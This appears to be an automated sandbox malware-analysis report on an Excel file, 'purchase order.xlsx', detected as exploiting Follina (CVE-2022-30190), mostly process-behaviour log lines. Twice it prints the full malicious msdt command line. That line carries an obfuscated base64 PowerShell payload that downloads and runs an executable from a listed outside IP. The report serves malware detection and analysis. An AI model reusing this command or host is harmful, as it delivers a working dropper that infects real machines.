Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 812 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dll Jump to dropped file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\msdt.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 653502 Sample: purchase order.xlsx Startdate: 28/06/2022 Architecture: WINDOWS Score: 68 35 Multi AV Scanner detection for submitted file 2->35 37 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->37 39 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->39 41 Document exploit detected (process start blacklist hit) 2->41 6 EXCEL.EXE 31 45 2->6         started        10 csc.exe 3 2->10         started        12 csc.exe 3 2->12         started        14 csc.exe 1 2->14         started        process3 dnsIp4 33 172.245.119.48, 49773, 49783, 80 AS-COLOCROSSINGUS United States 6->33 27 C:\Users\user\Desktop\~$purchase order.xlsx, data 6->27 dropped 16 msdt.exe 21 6->16         started        29 C:\Users\user\AppData\Local\...\byhngmvt.dll, PE32 10->29 dropped 19 cvtres.exe 1 10->19         started        31 C:\Users\user\AppData\Local\...\1fyof3jw.dll, PE32 12->31 dropped 21 cvtres.exe 1 12->21         started        file5 process6 file7 23 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 16->23 dropped 25 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 16->25 dropped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.245.119.48
 unknown United States
36352 AS-COLOCROSSINGUS false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://172.245.119.48/870/vbc.exe false
  • Avira URL Cloud: safe
 unknown
http://172.245.119.48/shipping_invc/document.html false
  • Avira URL Cloud: safe
 unknown